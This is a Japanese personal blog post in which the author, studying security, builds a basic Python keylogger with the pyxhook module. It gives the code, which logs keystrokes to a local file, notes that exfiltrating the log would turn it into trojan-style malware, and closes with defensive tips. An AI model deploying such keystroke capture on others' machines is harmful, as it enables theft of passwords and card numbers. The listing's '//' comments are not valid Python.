*白百合めも*

セキュリティ中心に毎日の勉強の記録を書くよ*

Pythonでキーロガーやってみよう🌟

みなさんこんにちは🍰
白百合です😈

2018年になってもう10日以上経ってしまっていますが、
みなさんどうお過ごしですか??
私は正月ボケが抜けきらず、朝起きてもすぐ布団から出られずにゴロゴロしています笑
さすがにそろそろ社会人のコスプレをしなければいけませんね!



🍫pyHook→pyxhook

今日は、Python3でらくらく☆キーロガーをやっていきたいと思います🌺

pyxhook (https://github.com/JeffHoogland/pyxhook)
というモジュールを使っていきますよ!

ほんとは、
Windowsで動くpyHook(https://pypi.python.org/pypi/pyHook)というキーやマウスイベント用モジュール(pyxhookの元)を使いたかったのですが、
Python3でpyHookを試してみると、

TypeError: KeyboardSwitch() missing 8 required positional   
arguments: 'msg', 'vk_code', 'scan_code', 'ascii', 'flags',   
'time', 'hwnd', and 'win_name'  

というエラーが出てしまい、
調べるとどうやらPython3で出現するバグみたいで、pyHookはやめました。 (Python3用のpyHookモジュールもGithubにあがっていましたが既に心が折れていたので断念w)

代わりに、先に紹介した、Linuxで動くpyxhookモジュールを使おう!と決めました🌻
pyHookと使い方はほぼ同じです!!


🍫pyxhookの使い方

使い方は、pyxhookのリポジトリ内の"example.py"を見ればわかるようになっています🌷
以下、それをちょこっとだけ変えて、
押したキーのみを表示&Key.logというファイルにログを書き込んでいくようにしたコードです🌸

keylogger.py

import pyxhook

//ログの出力ファイルを指定
log_file = '/root/pythonstudy/log/Key.log'

//キーが押されるごとに呼び出される関数
def kbevent(event):

 //押されたキーの値を出力
    print(event.Key)
    
 //ログファイルを追記型で開き、押されたキーの値を出力
    log = open(log_file,'a')
    log.write(event.Key)
    
 //スペースキーが押されたら処理を終了する
 //(ログファイルをクローズ+HookManagerを終了)
    if event.Ascii == 32:
       log.close()
       hookman.cancel()

//HookManagerを定義する
hookman = pyxhook.HookManager()
//キーが押されたらkbevent関数を呼び出す定義をする
hookman.KeyDown = kbevent
//キーボードフックをセットする
hookman.HookKeyboard()
//HookManagerをスタートする
hookman.start()

なんとこれだけでキーロガーできてしまうんです・・・
めちゃめちゃ簡単ですよね(><)



🍫いざ、実食!

見出しは食戟のソーマの影響です・・・笑

実際に動かしてみたらこんな感じです🍓
youtu.be
あとは、このKey.logファイルを一週間毎くらいに別のホストに送ったりできたら、
トロイの木馬とかで使われてそうなキーロガーになりますねー

キーロガーが仕込まれていると、クレジット番号や、ユーザ名、パスワードなども
簡単に?盗まれてしまうので、ほんと嫌だなぁって思います👿👿

そういえば❣️ 最初、WindowsでpyHookを使ったコードの実行を試していたら、 入れていたセキュリティソフトが、「脅威を発見しました」ってそのファイルを削除しだして、
うわ、めっちゃ仕事してるやん...!ってホッとしたことがありました笑

キーロガーの対策は、
ウイルス対策ソフトをきちんとアップデートしたり、
パスワード管理ソフトを使って自動入力させたり、
(個人ではあまりしないかもだけど)ネットワークのパケットを検査して不審な通信が発生していないかチェックする
・・・あたりでしょうか。🍰
これ以外に有効な方法ありましたら教えてください!  

🍫ありがとうございました!

今日も読んでいただきありがとうございました♫
こないだイチゴを買ってきたらなかなか可愛い写真が撮れたのでこれをサムネにします🍓

f:id:white-lily6u6:20180114181023j:plain

最新公開作:フリー音楽素材|SHWフリー音楽素材
ここの、A pe Kamuy という曲がとても良いので気分上げたい時におすすめですよ!